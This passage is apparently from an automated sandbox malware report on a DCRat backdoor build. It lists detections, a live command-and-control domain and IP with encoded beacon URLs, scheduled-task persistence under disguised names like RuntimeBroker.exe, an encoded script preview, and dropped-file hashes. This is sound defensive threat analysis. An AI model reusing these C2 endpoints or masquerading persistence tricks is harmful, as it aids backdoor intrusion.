            C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Program Files\7-Zip\Lang\System.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Users\Default\Videos\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Users\Public\Music\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://cy98085.tw1.ru/ | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru/d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru/@=UmM2UTY4ADZ | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxk | 0% | Avira URL Cloud | safe | -
            http://cy98085.tw1.ru/@=UmM2UTY4ADZ | 2% | Virustotal | - | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            cy98085.tw1.ru | 185.114.245.123 | true | true | - | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W | true | Avira URL Cloud: safe | unknown
              http://cy98085.tw1.ru/d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM | true | Avira URL Cloud: safe | unknown
              http://cy98085.tw1.ru/@=UmM2UTY4ADZ | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | portperf.exe, 00000006.00000002.2222640406.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://cy98085.tw1.ru/ | dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://www.maxmind.com | dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002645000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://cy98085.tw1.ru | dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxk | dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  185.114.245.123 | cy98085.tw1.ru | Russian Federation | - | 9123 | TIMEWEB-ASRU | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1561293
                  Start date and time:2024-11-23 02:19:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 48s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:44
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DCRatBuild.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@46/27@1/1
                  EGA Information:
                  • Successful, ratio: 16.7%
                  HCA Information:
                  • Successful, ratio: 59%
                  • Number of executed functions: 313
                  • Number of non-executed functions: 89
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                  • Excluded IPs from analysis (whitelisted): 23.218.208.109
                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                  • Execution Graph export aborted for target System.exe, PID 7308 because it is empty
                  • Execution Graph export aborted for target System.exe, PID 7336 because it is empty
                  • Execution Graph export aborted for target dfVXJbANbh.exe, PID 7248 because it is empty
                  • Execution Graph export aborted for target dfVXJbANbh.exe, PID 7288 because it is empty
                  • Execution Graph export aborted for target portperf.exe, PID 3968 because it is empty
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  Time | Type | Description
                  02:20:05 | Task Scheduler | Run new task: dfVXJbANbh path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                  02:20:05 | Task Scheduler | Run new task: dfVXJbANbhd path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                  02:20:05 | Task Scheduler | Run new task: System path: "C:\Program Files\7-Zip\Lang\System.exe"
                  02:20:05 | Task Scheduler | Run new task: SystemS path: "C:\Program Files\7-Zip\Lang\System.exe"
                  02:20:07 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe"
                  02:20:07 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe"
                  20:20:06 | API Interceptor | 1875287x Sleep call for process: dfVXJbANbh.exe modified
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  185.114.245.123 | CPYEzG7VGh.exe | Get hash | malicious | DCRat | Browse | -
                  No context
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  TIMEWEB-ASRU | guia_luqf.vbs | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  TIMEWEB-ASRU | guia_evfs.vbs | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  TIMEWEB-ASRU | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.178.47.86
                  TIMEWEB-ASRU | CPYEzG7VGh.exe | Get hash | malicious | DCRat | Browse | 185.114.245.123
                  TIMEWEB-ASRU | DividasAtivas_tgj.vbs | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  TIMEWEB-ASRU | QYP0tD7z0c.exe | Get hash | malicious | DCRat | Browse | 92.53.106.114
                  TIMEWEB-ASRU | EBalcao_ysx.vbs | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  TIMEWEB-ASRU | kQyd2z80gD.exe | Get hash | malicious | DCRat | Browse | 92.53.106.114
                  TIMEWEB-ASRU | phc.exe | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  TIMEWEB-ASRU | Simple.exe | Get hash | malicious | Unknown | Browse | 92.53.116.138
                  No context
                  No context
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):230
                    Entropy (8bit):5.876818190822531
                    Encrypted:false
                    SSDEEP:6:GDwqK+NkLzWbH+8nZNDd3RL1wQJRivGkT/hBOs:GaMCzWL+4d3XBJhI/h
                    MD5:B3E0630669E9F81B3E57048E6AF1E015
                    SHA1:650473DC5A9144A544FB53AF84EF4FC8E0A72320
                    SHA-256:01543751A00DB2BBBAAF366AA712303363C484C1F9970AE04857F6703473A5E2
                    SHA-512:AC7E7FDF1FB92273A08E030D9F4B407FAA4B759C85932A7A2463DF92F83F5BB7B596B9D8B2E0ACEA1A20305903F4E425E7A82EDF4F12C9CA60C56F67BCA1236F
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:#@~^zQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vcT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZ4mk.AVKm0dEMDGomYnCT+xDoW.Yz$#AYgAD;{NG/;G5};(qRmBixNR8CDJSPZS,0C^/.YUIAAA==^#~@.
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):281
                    Entropy (8bit):5.813384628468723
                    Encrypted:false
                    SSDEEP:6:KAWO8ItJaVvqGORjLRjaJLVKzajRUH56gcDlQMWqKgCLP46omHjFXrz:KAWO8QJJx1aJWowcDKOh6omDFbz
                    MD5:4171D642B9AA90C325B6F19AA89C38B5
                    SHA1:BFB202AD8D1918B979F22206ADF91AD36D8FE62A
                    SHA-256:F021C4340CA6DCEBB9F9CB7223D1E7B77F0D10EFB051AF38A584C74307DA1BF3
                    SHA-512:2E8B79C189B577A0E75109CA7E23D600D37B1053D833D3A3BCA2E41F7D069559EF73B3C166B5A218A456FD5D5C9F0A7A2201A79F1BF16A9C748AD006E82205BA
                    Malicious:false
                    Preview:dtGhlXpMCAltJHNNpqbeWcgXjHT7XjuviemPHheH3h6IpWYGK25dzd4BMs7dDszdPzKpe8GILTlzfYsNtNwenR6FklCYjBELrd3zLtlMwxSf2EfyAuuz5V072FE35riKOZICf2B9lkrz9bNgGOYzQOQVm57GosREPHQc6cSItuOUnA8b2iwqTt3AJwZj55U3Tmk1Kuko5QGfA5sm7fOG5kvfOQSKCsNxaVBBZGQH8IvDnXAOExmZrO7t1Fn4balMCSFp3rN0OGIxyr20QEFPGxGLX
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):4.325313793475192
                    Encrypted:false
                    SSDEEP:3:I5vnFaxAAKj1n:I7aS1
                    MD5:00AFE3A3FCC7952DFADC97502A3AECAC
                    SHA1:6B7E7835CD437E437C91AD91255EFE5C8F24C0F4
                    SHA-256:5F60A9046FF7978E0518AD160509409A8818DBEA53FAA79C5D93364DD8D70F95
                    SHA-512:9AF6ECB3FF68382C633E640D29E86D17597FAA2AB712F75697BDF98596C6B17146991EC88FD94DF8C65A8FA6AE60E763A66747CF0BE4AE37D60BEB1E8FF87CC3
                    Malicious:false
                    Preview:"C:\ChainBlocksurrogateagentFont\portperf.exe"
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (597), with no line terminators
                    Category:dropped
                    Size (bytes):597
                    Entropy (8bit):5.867272612161713
                    Encrypted:false
                    SSDEEP:12:xfnBXEMTLvtILnkUHLQAMdQK+EFHzd8gVBjNwP9hF/KsHoP1jT2YNnZyUbu:xfBxrtykrfbFTdPVB2THoP1H26nZ0
                    MD5:A6D33A0FEA067787A580018E536C060C
                    SHA1:D85F3E7B3E13AB7177E4B39E4A2C58BD5231F3BF
                    SHA-256:EEB75D5285E8BA8BD81630EED86F2B6F731C8224337CB40C3CD121BEDDDA18E4
                    SHA-512:4B02E2BE150A272C51B2672EE7EFD24A067C6C094D72F603C36DA89FDE792DC7D4442AE0879C72D9203C6ED2FBB1BCBB20A396FD933AE00D32041591697397F8
                    Malicious:false
                    Preview:
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (957), with no line terminators
                    Category:dropped
                    Size (bytes):957
                    Entropy (8bit):5.924144135839937
                    Encrypted:false
                    SSDEEP:24:VnCLeui4XOfJILAX27G0ZcPK/CrHut8fCPPW:VCLG4XOfGsbPK/CrV6Pe
                    MD5:BB7A2187469F35C9853FED77E49723A2
                    SHA1:A8DC9CEB1FD122666AD42C563C4022B91AAA96FA
                    SHA-256:29F86B2E60DD5A79658F49F406200551C0F055804477212A283942A7D63E4173
                    SHA-512:A1C5B27C95650BB3D8A101E44A3BA63AFA2F0159A8520DB75D3874BAD62D163A6A3126D38810BF3B889E3E822255921A63BBCB75DC18CE93A90B80DC82D7478C
                    Malicious:false
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (350), with no line terminators
                    Category:dropped
                    Size (bytes):350
                    Entropy (8bit):5.822026482305975
                    Encrypted:false
                    SSDEEP:6:89VpW8FtWfvqNVahl3T6UVmBoHgZCbEGZgT0vkFQoXQfTKjAatudmNN8JxClMves:epF/WfyHahl3goHYCb3ZgTqOQdfEudvf
                    MD5:DEF4764B729F154D5F230356853AA35E
                    SHA1:9978737A5674FF241A4E6369744265333E2A4B82
                    SHA-256:0A168DDA6057D324E82C4E40BFA9FA0E5FA7322B6A322420CFF6970FE1526905
                    SHA-512:980C4D3BAE27040F4B9F827B14184E626F69D4B5505A054039CB7D9BF3F86FF44F4A88241148FFC7FCCFFD16C6BEF63FDA8B2499CBC12CC29B24DDF6DB76673B
                    Malicious:false
                    Preview:RUUXkwKkGJ4JMwoXUWGPL3Rlh2W2bjRPrgj5usoTngFOX9HrrSOJcvKXDszrZRJg2ocpMtmlrwloyDOhupKIVHx6WL2C374VXjVthbe8qmbpJfj9eR6uGAKu1gTB1ksu2PROreATKMcsqHw1l2ilAJPWYl1BIdHG4qw4OUS9Rnj4ibEttbZ8CGusA5zGn9KrEVy9U2nQkiUWkUx7gIRqDIEx6E3TfLWSc20MnFY1yJYdwXIqH2jereo5RACQ8UvYMB3rekTbtZ14ukBj5NLml1k8O45nCH3eX9RudaLgjIuSmtLq8cVvIJxUb5djpqYlgWguTQGeBpCdGSWetOokwIWNM6Th7l
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (862), with no line terminators
                    Category:dropped
                    Size (bytes):862
                    Entropy (8bit):5.909284571628938
                    Encrypted:false
                    SSDEEP:24:XHTwbWsc9oUW2rGZhheu1Y3s9aKM20hPQccu/9LDm3tCAn25:XHTvCFpZhho3Oa6WlJJYCK25
                    MD5:DAF599B4CF32BD277DD31A78898F373A
                    SHA1:0A397E18CCED9B3001F58CF3167D929E7012FB78
                    SHA-256:8F446675867467B822FA6DB6353FFF58404D03F7C0C080AC41000AF293D39C50
                    SHA-512:530539BF7AA33DCB4BCA9EAD8A9F55DF3651C4CE70DC41FEE1569FD493DFF0D4E68A34E77DC79F2EDC422ACE47002C932E09E01C1CD9D87FDBCB857A5A164212
                    Malicious:false
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (943), with no line terminators
                    Category:dropped
                    Size (bytes):943
                    Entropy (8bit):5.92621778425062
                    Encrypted:false
                    SSDEEP:24:Y0sIyQyW17JXvZmcMi4dGx+Ecu0FwteN1yPYJ/0m:pRFX1ZxmH5d7uNQyPe/T
                    MD5:DAA066EE2168D8641348ECF2A5C6E9CB
                    SHA1:11D96F40A3A580A375F52A8B1BB110CDF731E129
                    SHA-256:84FF715B87C98037DBBCA89FEF08EB2CE2CD21F03BEC59C5DA9898C683971F22
                    SHA-512:C0F45730AA1704DA400DFAA0DA8242771EE01CD1F57937B7F247EDAED1E50C8295F2DDB41081191BA75EB8512EA0688EE1E1C46C257FD43A4874B834B18A1BEC
                    Malicious:false
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (887), with no line terminators
                    Category:dropped
                    Size (bytes):887
                    Entropy (8bit):5.903762018020118
                    Encrypted:false
                    SSDEEP:24:hiyKycI9cQd3S9qMVo38I1sDS2eXcO2xkkq736uwCc+n:ZKI+03S9qMVg8EHcO2xkkS6/7o
                    MD5:F1CD3ADBC85B40D51CCA1B157EE54283
                    SHA1:D64F1B485974599083A6FAB9900C3865D27A3F25
                    SHA-256:CD2FE6596E4942A53134C467E44E155CDF781E092B304AC993FC02A2A3944CFD
                    SHA-512:51E627D3D297BD42A380AC06C259412AF52C055275C763B7496EB5E9B3B5B287814145D0C398B78F1EAA8D3746D78DE51D0E981056D2AAC20B9483A5C15CB51A
                    Malicious:false
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):131
                    Entropy (8bit):5.566116394499032
                    Encrypted:false
                    SSDEEP:3:FMKnZRYyj8lkT3PHluJO9jxNxKGNigMovOqtvXfcMXWRVy8mn:2mR78SfHluMjxNM9g/vXtPuvm
                    MD5:DE9A815F6170B335D7E0C21A02A36A41
                    SHA1:E17D42E7A05A3387A36CAD9AB944A9B504EC78F2
                    SHA-256:3D6E550A79E3ADB9CC4B64F0D021723D83F02DCC672EA6E43F75BBED11F9FF67
                    SHA-512:08E785E3E058B4491D6E58B58EC99CC9F275D2E3455CE1B85422474B50C8B4CD8402E855C0F8A20846B47359B6B0C56F70361B91380FD9F34AC7768F7A3E754A
                    Malicious:false
                    Preview:dHjtiolbqDnwIsKT3yV6CmiFhoCA4WZNVuPJAWeqdp83HTFkybAIRwE0jeM3lkhTnaaXdBThTocXoo8NicMcWR5iqYjgJkF3HoQr2rHxIcymTrM5f8UJXE7Ve2rEbwYsjjP
                    Process:C:\Program Files\7-Zip\Lang\System.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1281
                    Entropy (8bit):5.370111951859942
                    Encrypted:false
                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                    Process:C:\Users\Default\Videos\dfVXJbANbh.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1281
                    Entropy (8bit):5.370111951859942
                    Encrypted:false
                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
